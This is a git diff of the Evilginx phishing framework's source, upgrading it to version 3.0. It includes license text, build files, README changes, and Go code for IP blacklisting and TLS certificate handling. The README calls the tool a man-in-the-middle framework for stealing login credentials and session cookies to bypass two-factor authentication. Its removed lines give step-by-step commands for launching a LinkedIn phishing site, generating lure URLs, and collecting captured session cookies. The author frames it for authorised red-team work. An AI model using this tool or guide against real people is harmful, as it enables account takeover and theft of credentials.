OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE
|
||||
WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGES.
|
||||
|
||||
### 17. Interpretation of Sections 15 and 16
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided above cannot be
|
||||
given local legal effect according to their terms, reviewing courts shall apply local
|
||||
law that most closely approximates an absolute waiver of all civil liability in
|
||||
connection with the Program, unless a warranty or assumption of liability accompanies
|
||||
a copy of the Program in return for a fee.
|
||||
|
||||
_END OF TERMS AND CONDITIONS_
|
||||
|
||||
## How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest possible use to
|
||||
the public, the best way to achieve this is to make it free software which everyone
|
||||
can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest to attach them
|
||||
to the start of each source file to most effectively state the exclusion of warranty;
|
||||
and each file should have at least the “copyright” line and a pointer to
|
||||
where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short notice like this
|
||||
when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type 'show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type 'show c' for details.
|
||||
|
||||
The hypothetical commands `show w` and `show c` should show the appropriate parts of
|
||||
the General Public License. Of course, your program's commands might be different;
|
||||
for a GUI interface, you would use an “about box”.
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school, if any, to
|
||||
sign a “copyright disclaimer” for the program, if necessary. For more
|
||||
information on this, and how to apply and follow the GNU GPL, see
|
||||
<<http://www.gnu.org/licenses/>>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program into
|
||||
proprietary programs. If your program is a subroutine library, you may consider it
|
||||
more useful to permit linking proprietary applications with the library. If this is
|
||||
what you want to do, use the GNU Lesser General Public License instead of this
|
||||
License. But first, please read
|
||||
<<http://www.gnu.org/philosophy/why-not-lgpl.html>>.
|
||||
Copyright (c) 2018-2023 Kuba Gretzky. All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are
|
||||
met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above
|
||||
copyright notice, this list of conditions and the following disclaimer
|
||||
in the documentation and/or other materials provided with the
|
||||
distribution.
|
||||
* Neither the name of Google Inc. nor the names of its
|
||||
contributors may be used to endorse or promote products derived from
|
||||
this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
|
||||
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
|
||||
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
|
||||
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
|
||||
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
|
||||
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
|
||||
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
|
||||
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
||||
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
|
||||
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
13
Makefile
13
Makefile
@ -1,19 +1,12 @@
|
||||
TARGET=evilginx
|
||||
PACKAGES=core database log parser
|
||||
|
||||
.PHONY: all
|
||||
.PHONY: all build clean
|
||||
all: build
|
||||
|
||||
build:
|
||||
@go build -o ./bin/$(TARGET) -mod=vendor
|
||||
@go build -o ./build/$(TARGET) -mod=vendor main.go
|
||||
|
||||
clean:
|
||||
@go clean
|
||||
@rm -f ./bin/$(TARGET)
|
||||
|
||||
install:
|
||||
@mkdir -p /usr/share/evilginx/phishlets
|
||||
@mkdir -p /usr/share/evilginx/templates
|
||||
@cp ./phishlets/* /usr/share/evilginx/phishlets/
|
||||
@cp ./templates/* /usr/share/evilginx/templates/
|
||||
@cp ./bin/$(TARGET) /usr/local/bin
|
||||
@rm -f ./build/$(TARGET)
|
||||
|
188
README.md
188
README.md
@ -5,7 +5,9 @@
|
||||
</p>
|
||||
</p>
|
||||
|
||||
**evilginx2** is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.
|
||||
# Evilginx 3.0
|
||||
|
||||
**Evilginx** is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.
|
||||
|
||||
This tool is a successor to [Evilginx](https://github.com/kgretzky/evilginx), released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website.
|
||||
Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.
|
||||
@ -18,9 +20,22 @@ Present version is fully written in GO as a standalone application, which implem
|
||||
|
||||
I am very much aware that Evilginx can be used for nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attacks. Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.
|
||||
|
||||
## Write-up
|
||||
## Evilginx Mastery Training Course
|
||||
|
||||
If you want to learn more about this phishing technique, I've published extensive blog posts about **evilginx2** here:
|
||||
If you want everything about reverse proxy phishing with **Evilginx** - check out my [Evilginx Mastery](https://academy.breakdev.org/evilginx-mastery) course!
|
||||
|
||||
<p align="center">
|
||||
<a href="https://academy.breakdev.org/evilginx-mastery"><img alt="Evilginx Mastery" src="https://raw.githubusercontent.com/kgretzky/evilginx2/master/media/img/evilginx_mastery.jpg" height="320" /></a>
|
||||
</p>
|
||||
|
||||
Learn everything about the latest methods of phishing, using reverse proxying to bypass Multi-Factor Authentication. Learn to think like an attacker, during your red team engagements, and become the master of phishing with Evilginx.
|
||||
|
||||
Grab it here:
|
||||
https://academy.breakdev.org/evilginx-mastery
|
||||
|
||||
## Write-ups
|
||||
|
||||
If you want to learn more about reverse proxy phishing, I've published extensive blog posts about **Evilginx** here:
|
||||
|
||||
[Evilginx 2.0 - Release](https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens)
|
||||
|
||||
@ -32,173 +47,18 @@ If you want to learn more about this phishing technique, I've published extensiv
|
||||
|
||||
[Evilginx 2.4 - Gone Phishing](https://breakdev.org/evilginx-2-4-gone-phishing/)
|
||||
|
||||
## Video guide
|
||||
[Evilginx 3.0](https://breakdev.org/evilginx-3-0-evilginx-mastery/)
|
||||
|
||||
Take a look at the fantastic videos made by Luke Turvey ([@TurvSec](https://twitter.com/TurvSec)), which fully explain how to get started using **evilginx2**.
|
||||
## Help
|
||||
|
||||
[](https://mrturvey.co.uk/aiovg_videos/how-to-phish-for-passwords-and-bypass-2fa/)
|
||||
[](https://mrturvey.co.uk/aiovg_videos/creating-custom-phishlets-for-evilginx2-2fa-bypass/)
|
||||
In case you want to learn how to install and use **Evilginx**, please refer to online documentation available at:
|
||||
|
||||
## Phishlet Masters - Hall of Fame
|
||||
|
||||
Please thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)
|
||||
|
||||
[**@an0nud4y**](https://twitter.com/an0nud4y) - PayPal, TikTok, Coinbase, Airbnb
|
||||
|
||||
[**@cust0msync**](https://twitter.com/cust0msync) - Amazon, Reddit
|
||||
|
||||
[**@white_fi**](https://twitter.com/white_fi) - Twitter
|
||||
|
||||
[**rvrsh3ll @424f424f**](https://twitter.com/424f424f) - Citrix
|
||||
|
||||
[**audibleblink @4lex**](https://twitter.com/4lex) - GitHub
|
||||
|
||||
[**@JamesCullum**](https://github.com/JamesCullum) - Office 365
|
||||
|
||||
## Installation
|
||||
|
||||
You can either use a [precompiled binary package](https://github.com/kgretzky/evilginx2/releases) for your architecture or you can compile **evilginx2** from source.
|
||||
|
||||
You will need an external server where you'll host your **evilginx2** installation. I personally recommend Digital Ocean and if you follow my referral link, you will [get an extra $10 to spend on servers for free](https://m.do.co/c/50338abc7ffe).
|
||||
|
||||
Evilginx runs very well on the most basic Debian 8 VPS.
|
||||
|
||||
#### Installing from source
|
||||
|
||||
In order to compile from source, make sure you have installed **GO** of version at least **1.14.0** (get it from [here](https://golang.org/doc/install)).
|
||||
|
||||
When you have GO installed, type in the following:
|
||||
|
||||
```
|
||||
sudo apt-get -y install git make
|
||||
git clone https://github.com/kgretzky/evilginx2.git
|
||||
cd evilginx2
|
||||
make
|
||||
```
|
||||
|
||||
You can now either run **evilginx2** from local directory like:
|
||||
```
|
||||
sudo ./bin/evilginx -p ./phishlets/
|
||||
```
|
||||
or install it globally:
|
||||
```
|
||||
sudo make install
|
||||
sudo evilginx
|
||||
```
|
||||
|
||||
Instructions above can also be used to update **evilginx2** to the latest version.
|
||||
|
||||
#### Installing with Docker
|
||||
|
||||
You can launch **evilginx2** from within Docker. First build the image:
|
||||
```
|
||||
docker build . -t evilginx2
|
||||
```
|
||||
|
||||
Then you can run the container:
|
||||
```
|
||||
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
|
||||
```
|
||||
|
||||
Phishlets are loaded within the container at `/app/phishlets`, which can be mounted as a volume for configuration.
|
||||
|
||||
#### Installing from precompiled binary packages
|
||||
|
||||
Grab the package you want from [here](https://github.com/kgretzky/evilginx2/releases) and drop it on your box. Then do:
|
||||
```
|
||||
tar zxvf evilginx-linux-amd64.tar.gz
|
||||
cd evilginx
|
||||
```
|
||||
|
||||
If you want to do a system-wide install, use the install script with root privileges:
|
||||
```
|
||||
chmod 700 ./install.sh
|
||||
sudo ./install.sh
|
||||
sudo evilginx
|
||||
```
|
||||
or just launch **evilginx2** from the current directory (you will also need root privileges):
|
||||
```
|
||||
chmod 700 ./evilginx
|
||||
sudo ./evilginx
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
**IMPORTANT!** Make sure that there is no service listening on ports `TCP 443`, `TCP 80` and `UDP 53`. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. **evilginx2** will tell you on launch if it fails to open a listening socket on any of these ports.
|
||||
|
||||
By default, **evilginx2** will look for phishlets in `./phishlets/` directory and later in `/usr/share/evilginx/phishlets/`. If you want to specify a custom path to load phishlets from, use the `-p <phishlets_dir_path>` parameter when launching the tool.
|
||||
|
||||
By default, **evilginx2** will look for HTML temapltes in `./templates/` directory and later in `/usr/share/evilginx/templates/`. If you want to specify a custom path to load HTML templates from, use the `-t <templates_dir_path>` parameter when launching the tool.
|
||||
|
||||
```
|
||||
Usage of ./evilginx:
|
||||
-c string
|
||||
Configuration directory path
|
||||
-debug
|
||||
Enable debug output
|
||||
-developer
|
||||
Enable developer mode (generates self-signed certificates for all hostnames)
|
||||
-p string
|
||||
Phishlets directory path
|
||||
-t string
|
||||
HTML templates directory path
|
||||
```
|
||||
|
||||
You should see **evilginx2** logo with a prompt to enter commands. Type `help` or `help <command>` if you want to see available commands or more detailed information on them.
|
||||
|
||||
## Getting started
|
||||
|
||||
To get up and running, you need to first do some setting up.
|
||||
|
||||
At this point I assume, you've already registered a domain (let's call it `yourdomain.com`) and you set up the nameservers (both `ns1` and `ns2`) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):
|
||||
```
|
||||
ns1.yourdomain.com = 10.0.0.1
|
||||
ns2.yourdomain.com = 10.0.0.1
|
||||
```
|
||||
|
||||
Set up your server's domain and IP using following commands:
|
||||
```
|
||||
config domain yourdomain.com
|
||||
config ip 10.0.0.1
|
||||
```
|
||||
|
||||
Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):
|
||||
```
|
||||
phishlets hostname linkedin my.phishing.hostname.yourdomain.com
|
||||
```
|
||||
|
||||
And now you can `enable` the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:
|
||||
```
|
||||
phishlets enable linkedin
|
||||
```
|
||||
|
||||
Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to `https://www.google.com`):
|
||||
```
|
||||
lures create linkedin
|
||||
lures edit 0 redirect_url https://www.google.com
|
||||
lures get-url 0
|
||||
```
|
||||
|
||||
Running phishlets will only respond to phishing links generating for specific lures, so any scanners who scan your main domain will be redirected to URL specified as `redirect_url` under `config`. If you want to hide your phishlet and make it not respond even to valid lure phishing URLs, use `phishlet hide/unhide <phishlet>` command.
|
||||
|
||||
You can monitor captured credentials and session cookies with:
|
||||
```
|
||||
sessions
|
||||
```
|
||||
|
||||
To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:
|
||||
```
|
||||
sessions <id>
|
||||
```
|
||||
|
||||
The captured session cookie can be copied and imported into Chrome browser, using [EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en) extension.
|
||||
|
||||
**Important!** If you want **evilginx2** to continue running after you log out from your server, you should run it inside a `screen` or `tmux` session.
|
||||
https://help.evilginx.com
|
||||
|
||||
## Support
|
||||
|
||||
I DO NOT offer support for providing or creating phishlets. I will also NOT help you with creation of your own phishlets. There are many phishlets provided as examples, which you can use to create your own.
|
||||
I DO NOT offer support for providing or creating phishlets. I will also NOT help you with creation of your own phishlets. Please look for ready-to-use phishlets, provided by other people.
|
||||
|
||||
## License
|
||||
|
||||
**evilginx2** is made by Kuba Gretzky ([@mrgretzky](https://twitter.com/mrgretzky)) and it's released under GPL3 license.
|
||||
**evilginx2** is made by Kuba Gretzky ([@mrgretzky](https://twitter.com/mrgretzky)) and it's released under BSD-3 license.
|
||||
|
4
build.bat
Normal file
4
build.bat
Normal file
@ -0,0 +1,4 @@
|
||||
@echo off
|
||||
set GOARCH=amd64
|
||||
echo Building...
|
||||
go build -o .\build\evilginx.exe -mod=vendor
|
4
build_run.bat
Normal file
4
build_run.bat
Normal file
@ -0,0 +1,4 @@
|
||||
@echo off
|
||||
set GOARCH=amd64
|
||||
echo Building...
|
||||
go build -o .\build\evilginx.exe -mod=vendor && cls && .\build\evilginx.exe -p ./phishlets -t ./redirectors -developer -debug
|
@ -8,7 +8,7 @@ import (
|
||||
)
|
||||
|
||||
const (
|
||||
VERSION = "2.4.2"
|
||||
VERSION = "3.0.0"
|
||||
)
|
||||
|
||||
func putAsciiArt(s string) {
|
||||
@ -55,8 +55,8 @@ func printLogo(s string) {
|
||||
}
|
||||
|
||||
func printUpdateName() {
|
||||
nameClr := color.New(color.FgHiRed)
|
||||
txt := nameClr.Sprintf(" - -- Gone Phishing -- -")
|
||||
nameClr := color.New(color.FgHiWhite)
|
||||
txt := nameClr.Sprintf(" - -- Community Edition -- -")
|
||||
fmt.Fprintf(color.Output, "%s", txt)
|
||||
}
|
||||
|
||||
|
@ -10,12 +10,6 @@ import (
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
)
|
||||
|
||||
const (
|
||||
BLACKLIST_MODE_FULL = 0
|
||||
BLACKLIST_MODE_UNAUTH = 1
|
||||
BLACKLIST_MODE_OFF = 2
|
||||
)
|
||||
|
||||
type BlockIP struct {
|
||||
ipv4 net.IP
|
||||
mask *net.IPNet
|
||||
@ -25,7 +19,7 @@ type Blacklist struct {
|
||||
ips map[string]*BlockIP
|
||||
masks []*BlockIP
|
||||
configPath string
|
||||
mode int
|
||||
verbose bool
|
||||
}
|
||||
|
||||
func NewBlacklist(path string) (*Blacklist, error) {
|
||||
@ -38,7 +32,7 @@ func NewBlacklist(path string) (*Blacklist, error) {
|
||||
bl := &Blacklist{
|
||||
ips: make(map[string]*BlockIP),
|
||||
configPath: path,
|
||||
mode: BLACKLIST_MODE_OFF,
|
||||
verbose: true,
|
||||
}
|
||||
|
||||
fs := bufio.NewScanner(f)
|
||||
@ -71,10 +65,14 @@ func NewBlacklist(path string) (*Blacklist, error) {
|
||||
}
|
||||
}
|
||||
|
||||
log.Info("blacklist: loaded %d ip addresses or ip masks", len(bl.ips)+len(bl.masks))
|
||||
log.Info("blacklist: loaded %d ip addresses and %d ip masks", len(bl.ips), len(bl.masks))
|
||||
return bl, nil
|
||||
}
|
||||
|
||||
func (bl *Blacklist) GetStats() (int, int) {
|
||||
return len(bl.ips), len(bl.masks)
|
||||
}
|
||||
|
||||
func (bl *Blacklist) AddIP(ip string) error {
|
||||
if bl.IsBlacklisted(ip) {
|
||||
return nil
|
||||
@ -118,3 +116,11 @@ func (bl *Blacklist) IsBlacklisted(ip string) bool {
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (bl *Blacklist) SetVerbose(verbose bool) {
|
||||
bl.verbose = verbose
|
||||
}
|
||||
|
||||
func (bl *Blacklist) IsVerbose() bool {
|
||||
return bl.verbose
|
||||
}
|
||||
|
394
core/certdb.go
394
core/certdb.go
@ -1,7 +1,7 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"crypto"
|
||||
"context"
|
||||
"crypto/rand"
|
||||
"crypto/rsa"
|
||||
"crypto/tls"
|
||||
@ -13,114 +13,104 @@ import (
|
||||
"math/big"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
|
||||
"github.com/go-acme/lego/v3/certcrypto"
|
||||
"github.com/go-acme/lego/v3/certificate"
|
||||
"github.com/go-acme/lego/v3/challenge"
|
||||
"github.com/go-acme/lego/v3/lego"
|
||||
legolog "github.com/go-acme/lego/v3/log"
|
||||
"github.com/go-acme/lego/v3/registration"
|
||||
"github.com/caddyserver/certmagic"
|
||||
)
|
||||
|
||||
const HOSTS_DIR = "hosts"
|
||||
|
||||
type CertDb struct {
|
||||
PrivateKey *rsa.PrivateKey
|
||||
CACert tls.Certificate
|
||||
client *lego.Client
|
||||
certUser CertUser
|
||||
dataDir string
|
||||
ns *Nameserver
|
||||
hs *HttpServer
|
||||
cfg *Config
|
||||
hostCache map[string]*tls.Certificate
|
||||
phishletCache map[string]map[string]*tls.Certificate
|
||||
tls_cache map[string]*tls.Certificate
|
||||
httpChallenge *HTTPChallenge
|
||||
cache_dir string
|
||||
magic *certmagic.Config
|
||||
cfg *Config
|
||||
ns *Nameserver
|
||||
caCert tls.Certificate
|
||||
tlsCache map[string]*tls.Certificate
|
||||
}
|
||||
|
||||
type CertUser struct {
|
||||
Email string
|
||||
Registration *registration.Resource
|
||||
key crypto.PrivateKey
|
||||
}
|
||||
func NewCertDb(cache_dir string, cfg *Config, ns *Nameserver) (*CertDb, error) {
|
||||
os.Setenv("XDG_DATA_HOME", cache_dir)
|
||||
|
||||
func (u CertUser) GetEmail() string {
|
||||
return u.Email
|
||||
}
|
||||
|
||||
func (u CertUser) GetRegistration() *registration.Resource {
|
||||
return u.Registration
|
||||
}
|
||||
|
||||
func (u CertUser) GetPrivateKey() crypto.PrivateKey {
|
||||
return u.key
|
||||
}
|
||||
|
||||
type HTTPChallenge struct {
|
||||
crt_db *CertDb
|
||||
}
|
||||
|
||||
func (ch HTTPChallenge) Present(domain, token, keyAuth string) error {
|
||||
ch.crt_db.hs.AddACMEToken(token, keyAuth)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (ch HTTPChallenge) CleanUp(domain, token, keyAuth string) error {
|
||||
ch.crt_db.hs.ClearACMETokens()
|
||||
return nil
|
||||
}
|
||||
|
||||
const acmeURL = "https://acme-v02.api.letsencrypt.org/directory"
|
||||
|
||||
//const acmeURL = "https://acme-staging-v02.api.letsencrypt.org/directory"
|
||||
|
||||
func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*CertDb, error) {
|
||||
d := &CertDb{
|
||||
cfg: cfg,
|
||||
dataDir: data_dir,
|
||||
ns: ns,
|
||||
hs: hs,
|
||||
o := &CertDb{
|
||||
cache_dir: cache_dir,
|
||||
cfg: cfg,
|
||||
ns: ns,
|
||||
tlsCache: make(map[string]*tls.Certificate),
|
||||
}
|
||||
|
||||
legolog.Logger = log.NullLogger()
|
||||
d.hostCache = make(map[string]*tls.Certificate)
|
||||
d.phishletCache = make(map[string]map[string]*tls.Certificate)
|
||||
d.tls_cache = make(map[string]*tls.Certificate)
|
||||
certmagic.DefaultACME.Agreed = true
|
||||
certmagic.DefaultACME.Email = o.GetEmail()
|
||||
|
||||
pkey_pem, err := ioutil.ReadFile(filepath.Join(data_dir, "private.key"))
|
||||
|
||||
err := o.generateCertificates()
|
||||
if err != nil {
|
||||
// private key corrupted or not found, recreate and delete all public certificates
|
||||
os.RemoveAll(filepath.Join(data_dir, "*"))
|
||||
return nil, err
|
||||
}
|
||||
err = o.reloadCertificates()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
d.PrivateKey, err = rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("private key generation failed")
|
||||
}
|
||||
pkey_pem = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "RSA PRIVATE KEY",
|
||||
Bytes: x509.MarshalPKCS1PrivateKey(d.PrivateKey),
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(data_dir, "private.key"), pkey_pem, 0600)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
o.magic = certmagic.NewDefault()
|
||||
|
||||
return o, nil
|
||||
}
|
||||
|
||||
func (o *CertDb) GetEmail() string {
|
||||
var email string
|
||||
fn := filepath.Join(o.cache_dir, "email.txt")
|
||||
|
||||
data, err := ReadFromFile(fn)
|
||||
if err != nil {
|
||||
email = strings.ToLower(GenRandomString(3) + "@" + GenRandomString(6) + ".com")
|
||||
if SaveToFile([]byte(email), fn, 0600) != nil {
|
||||
log.Error("saving email error: %s", err)
|
||||
}
|
||||
} else {
|
||||
block, _ := pem.Decode(pkey_pem)
|
||||
email = strings.TrimSpace(string(data))
|
||||
}
|
||||
return email
|
||||
}
|
||||
|
||||
func (o *CertDb) generateCertificates() error {
|
||||
var key *rsa.PrivateKey
|
||||
|
||||
pkey, err := ioutil.ReadFile(filepath.Join(o.cache_dir, "private.key"))
|
||||
if err != nil {
|
||||
pkey, err = ioutil.ReadFile(filepath.Join(o.cache_dir, "ca.key"))
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
// private key corrupted or not found, recreate and delete all public certificates
|
||||
os.RemoveAll(filepath.Join(o.cache_dir, "*"))
|
||||
|
||||
key, err = rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
return fmt.Errorf("private key generation failed")
|
||||
}
|
||||
pkey = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "RSA PRIVATE KEY",
|
||||
Bytes: x509.MarshalPKCS1PrivateKey(key),
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(o.cache_dir, "ca.key"), pkey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
} else {
|
||||
block, _ := pem.Decode(pkey)
|
||||
if block == nil {
|
||||
return nil, fmt.Errorf("private key is corrupted")
|
||||
return fmt.Errorf("private key is corrupted")
|
||||
}
|
||||
|
||||
d.PrivateKey, err = x509.ParsePKCS1PrivateKey(block.Bytes)
|
||||
key, err = x509.ParsePKCS1PrivateKey(block.Bytes)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
ca_crt_pem, err := ioutil.ReadFile(filepath.Join(data_dir, "ca.crt"))
|
||||
ca_cert, err := ioutil.ReadFile(filepath.Join(o.cache_dir, "ca.crt"))
|
||||
if err != nil {
|
||||
notBefore := time.Now()
|
||||
aYear := time.Duration(10*365*24) * time.Hour
|
||||
@ -128,7 +118,7 @@ func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*C
|
||||
serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
|
||||
serialNumber, err := rand.Int(rand.Reader, serialNumberLimit)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
|
||||
template := x509.Certificate{
|
||||
@ -148,242 +138,64 @@ func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*C
|
||||
IsCA: true,
|
||||
}
|
||||
|
||||
cert, err := x509.CreateCertificate(rand.Reader, &template, &template, &d.PrivateKey.PublicKey, d.PrivateKey)
|
||||
cert, err := x509.CreateCertificate(rand.Reader, &template, &template, &key.PublicKey, key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
ca_crt_pem = pem.EncodeToMemory(&pem.Block{
|
||||
ca_cert = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "CERTIFICATE",
|
||||
Bytes: cert,
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(data_dir, "ca.crt"), ca_crt_pem, 0600)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
|
||||
d.CACert, err = tls.X509KeyPair(ca_crt_pem, pkey_pem)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return d, nil
|
||||
}
|
||||
|
||||
func (d *CertDb) Reset() {
|
||||
d.certUser.Email = "" //hostmaster@" + d.cfg.GetBaseDomain()
|
||||
}
|
||||
|
||||
func (d *CertDb) SetupHostnameCertificate(hostname string) error {
|
||||
err := d.loadHostnameCertificate(hostname)
|
||||
if err != nil {
|
||||
log.Warning("failed to load certificate files for hostname '%s': %v", hostname, err)
|
||||
log.Info("requesting SSL/TLS certificates from LetsEncrypt...")
|
||||
err = d.obtainHostnameCertificate(hostname)
|
||||
err = ioutil.WriteFile(filepath.Join(o.cache_dir, "ca.crt"), ca_cert, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) GetHostnameCertificate(hostname string) (*tls.Certificate, error) {
|
||||
cert, ok := d.hostCache[hostname]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
return nil, fmt.Errorf("certificate for hostname '%s' not found", hostname)
|
||||
}
|
||||
|
||||
func (d *CertDb) addHostnameCertificate(hostname string, cert *tls.Certificate) {
|
||||
d.hostCache[hostname] = cert
|
||||
}
|
||||
|
||||
func (d *CertDb) loadHostnameCertificate(hostname string) error {
|
||||
crt_dir := filepath.Join(d.dataDir, HOSTS_DIR)
|
||||
|
||||
cert, err := tls.LoadX509KeyPair(filepath.Join(crt_dir, hostname+".crt"), filepath.Join(crt_dir, hostname+".key"))
|
||||
o.caCert, err = tls.X509KeyPair(ca_cert, pkey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addHostnameCertificate(hostname, &cert)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) obtainHostnameCertificate(hostname string) error {
|
||||
if err := CreateDir(filepath.Join(d.dataDir, HOSTS_DIR), 0700); err != nil {
|
||||
return err
|
||||
}
|
||||
crt_dir := filepath.Join(d.dataDir, HOSTS_DIR)
|
||||
|
||||
domains := []string{hostname}
|
||||
cert_res, err := d.registerCertificate(domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
cert, err := tls.X509KeyPair(cert_res.Certificate, cert_res.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addHostnameCertificate(hostname, &cert)
|
||||
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, hostname+".crt"), cert_res.Certificate, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, hostname+".key"), cert_res.PrivateKey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) SetupPhishletCertificate(site_name string, domains []string) error {
|
||||
base_domain, ok := d.cfg.GetSiteDomain(site_name)
|
||||
if !ok {
|
||||
return fmt.Errorf("phishlet '%s' not found", site_name)
|
||||
}
|
||||
|
||||
err := d.loadPhishletCertificate(site_name, base_domain)
|
||||
if err != nil {
|
||||
log.Warning("failed to load certificate files for phishlet '%s', domain '%s': %v", site_name, base_domain, err)
|
||||
log.Info("requesting SSL/TLS certificates from LetsEncrypt...")
|
||||
err = d.obtainPhishletCertificate(site_name, base_domain, domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) GetPhishletCertificate(site_name string, base_domain string) (*tls.Certificate, error) {
|
||||
